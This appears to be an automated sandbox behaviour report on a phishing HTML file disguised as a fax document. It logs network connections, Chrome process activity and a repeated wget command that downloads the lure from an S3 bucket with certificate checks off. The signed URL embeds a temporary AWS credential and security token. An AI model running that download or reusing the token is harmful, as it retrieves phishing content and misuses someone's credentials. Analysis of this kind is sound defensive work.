Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57057 -> 443

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.10.199:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.6:57019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:57027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:57063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:57081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53014 version: TLS 1.2

Creates files inside the system directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\manifest.fingerprint	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_764_672093908

Jump to behavior

Very long command line found

Source: unknown	Process created: Commandline size = 2083
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2035
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2035	Jump to behavior

Source: classification engine

Classification label: mal48.phis.win@28/28@26/13

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\cmdline.out

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03

Source: C:\Windows\SysWOW64\wget.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%2A%3DUTF-8%27%27FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%2A%3DUTF-8%27%27FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\FaxDocument-873422-Wcepinc-Transmission.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1916,i,1730709302199590936,13554322330194458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%2A%3DUTF-8%27%27FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1916,i,1730709302199590936,13554322330194458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: explorerframe.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: wget.exe, 00000002.00000002.2182067093.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3b%20filename%3d%22faxdocument-873422-wcepinc-transmission.html%22%3b%20filename%2a%3dutf-8%27%27faxdocument-873422-wcepinc-transmission.html&x-amz-algorithm=aws4-hmac-sha256&x-amz-credential=asia37krem2qlqcgjml5%2f20241024%2fus-east-1%2fs3%2faws4_request&x-amz-date=20241024t201816z&x-amz-expires=15711&x-amz-security-token=iqojb3jpz2lux2vjehmacxvzlwvhc3qtmsjimeyciqd5%2bhzvzgn6j3fxb1eh7jhgjfyatdm4yse%2fb1lhu54clwihamgxufenqyupv%2fcfnjf%2fm%2bjk%2fqrmeneohuay3bkekkvekogecnz%2f%2f%2f%2f%2f%2f%2f%2f%2f%2fweqabomodizmtkzmjy1odi0igxkadsnklcvctvwmwiq3apvqpqpi58knfbaui%2fesqh1fjltx%2blsdpxwhmieoa7jjlduxndzztecvouwvp1oli1h3ptjspl3wxfiui7btzihzeqp3qn85awxido1fwb1mbpd%2fsdfsrqmegho9oqjpzpsqhm6e%2bmlmz1ytihd97pf%2fn08letryezz2nfjviqrlytvwqwr2qpezjyim0wnusbbq8q1iymha%2fiyvb9zkxoppvdgr1ptxz6oljzsy%2bt%2bjafeiswzysrdwwvlziujqwg%2b63t%2bpcq3bxmyasshjxnzarim7hms4aoj9sivr9pkl0wwd3qkwg7obyhnb8k0%2b1azzdj2e%2fflvd9tiwcg1kstezsabhjpeebxtzduckidp%2fcb%2fycv03kyjnwwzumaibwdrv3llj4itvulpzpubom8rjchrmb83tr2qzdnkkjyktsr42en1uqps%2bu0qdc%2fg93%2ffw2lixwumotybf1fwyey2oqz6e5eroigwqhmg4wje1zzgjwp8feqsg0yo9xznxr%2fyau%2bet2rnzwy2whuozk3hvwps4lwnhtytcrsndmgkxkfvspheqcqkf3xveabehd%2f9qqutdiicwnbbalsilk5euphzylvkimybmtiectf00%2ffhqo4eoclx5sgvdchqeq4bjqkaeyfm5a%2febzwf4uw87xmbquziribz00bbmxsr1f6inqrk5eiamnksyuyh%2fp3yjofau0ox8%2fovlihbkp3wtdzd5b5%2f5wwioymht1u0bdnhnt%2f%2b11yttesy4rc4fiydhkm7tzrfs9sa1wiiqxgqibqqjkrydzt%2flrmsyvtvk8wbscwkrvzxnu%2bsi4oujjhkmj27ywwc3ob5ne4d4%2fwryfib%2f4hwjo4&x-amz-signedheaders=host&x-amz-signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3b%20filename%3d%22faxdocument-873422-wcepinc-transmission.html%22%3b%20filename%2a%3dutf-8%27%27faxdocument-873422-wcepinc-transmission.html&x-amz-algorithm=aws4-hmac-sha256&x-amz-credential=asia37krem2qlqcgjml5%2f20241024%2fus-east-1%2fs3%2faws4_request&x-amz-date=20241024t201816z&x-amz-expires=15711&x-amz-security-token=iqojb3jpz2lux2vjehmacxvzlwvhc3qtmsjimeyciqd5%2bhzvzgn6j3fxb1eh7jhgjfyatdm4yse%2fb1lhu54clwihamgxufenqyupv%2fcfnjf%2fm%2bjk%2fqrmeneohuay3bkekkvekogecnz%2f%2f%2f%2f%2f%2f%2f%2f%2f%2fweqabomodizmtkzmjy1odi0igxkadsnklcvctvwmwiq3apvqpqpi58knfbaui%2fesqh1fjltx%2blsdpxwhmieoa7jjlduxndzztecvouwvp1oli1h3ptjspl3wxfiui7btzihzeqp3qn85awxido1fwb1mbpd%2fsdfsrqmegho9oqjpzpsqhm6e%2bmlmz1ytihd97pf%2fn08letryezz2nfjviqrlytvwqwr2qpezjyim0wnusbbq8q1iymha%2fiyvb9zkxoppvdgr1ptxz6oljzsy%2bt%2bjafeiswzysrdwwvlziujqwg%2b63t%2bpcq3bxmyasshjxnzarim7hms4aoj9sivr9pkl0wwd3qkwg7obyhnb8k0%2b1azzdj2e%2fflvd9tiwcg1kstezsabhjpeebxtzduckidp%2fcb%2fycv03kyjnwwzumaibwdrv3llj4itvulpzpubom8rjchrmb83tr2qzdnkkjyktsr42en1uqps%2bu0qdc%2fg93%2ffw2lixwumotybf1fwyey2oqz6e5eroigwqhmg4wje1zzgjwp8feqsg0yo9xznxr%2fyau%2bet2rnzwy2whuozk3hvwps4lwnhtytcrsndmgkxkfvspheqcqkf3xveabehd%2f9qqutdiicwnbbalsilk5euphzylvkimybmtiectf00%2ffhqo4eoclx5sgvdchqeq4bjqkaeyfm5a%2febzwf4uw87xmbquziribz00bbmxsr1f6inqrk5eiamnksyuyh%2fp3yjofau0ox8%2fovlihbkp3wtdzd5b5%2f5wwioymht1u0bdnhnt%2f%2b11yttesy4rc4fiydhkm7tzrfs9sa1wiiqxgqibqqjkrydzt%2flrmsyvtvk8wbscwkrvzxnu%2bsi4oujjhkmj27ywwc3ob5ne4d4%2fwryfib%2f4hwjo4&x-amz-signedheaders=host&x-amz-signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3b%20filename%3d%22faxdocument-873422-wcepinc-transmission.html%22%3b%20filename%2a%3dutf-8%27%27faxdocument-873422-wcepinc-transmission.html&x-amz-algorithm=aws4-hmac-sha256&x-amz-credential=asia37krem2qlqcgjml5%2f20241024%2fus-east-1%2fs3%2faws4_request&x-amz-date=20241024t201816z&x-amz-expires=15711&x-amz-security-token=iqojb3jpz2lux2vjehmacxvzlwvhc3qtmsjimeyciqd5%2bhzvzgn6j3fxb1eh7jhgjfyatdm4yse%2fb1lhu54clwihamgxufenqyupv%2fcfnjf%2fm%2bjk%2fqrmeneohuay3bkekkvekogecnz%2f%2f%2f%2f%2f%2f%2f%2f%2f%2fweqabomodizmtkzmjy1odi0igxkadsnklcvctvwmwiq3apvqpqpi58knfbaui%2fesqh1fjltx%2blsdpxwhmieoa7jjlduxndzztecvouwvp1oli1h3ptjspl3wxfiui7btzihzeqp3qn85awxido1fwb1mbpd%2fsdfsrqmegho9oqjpzpsqhm6e%2bmlmz1ytihd97pf%2fn08letryezz2nfjviqrlytvwqwr2qpezjyim0wnusbbq8q1iymha%2fiyvb9zkxoppvdgr1ptxz6oljzsy%2bt%2bjafeiswzysrdwwvlziujqwg%2b63t%2bpcq3bxmyasshjxnzarim7hms4aoj9sivr9pkl0wwd3qkwg7obyhnb8k0%2b1azzdj2e%2fflvd9tiwcg1kstezsabhjpeebxtzduckidp%2fcb%2fycv03kyjnwwzumaibwdrv3llj4itvulpzpubom8rjchrmb83tr2qzdnkkjyktsr42en1uqps%2bu0qdc%2fg93%2ffw2lixwumotybf1fwyey2oqz6e5eroigwqhmg4wje1zzgjwp8feqsg0yo9xznxr%2fyau%2bet2rnzwy2whuozk3hvwps4lwnhtytcrsndmgkxkfvspheqcqkf3xveabehd%2f9qqutdiicw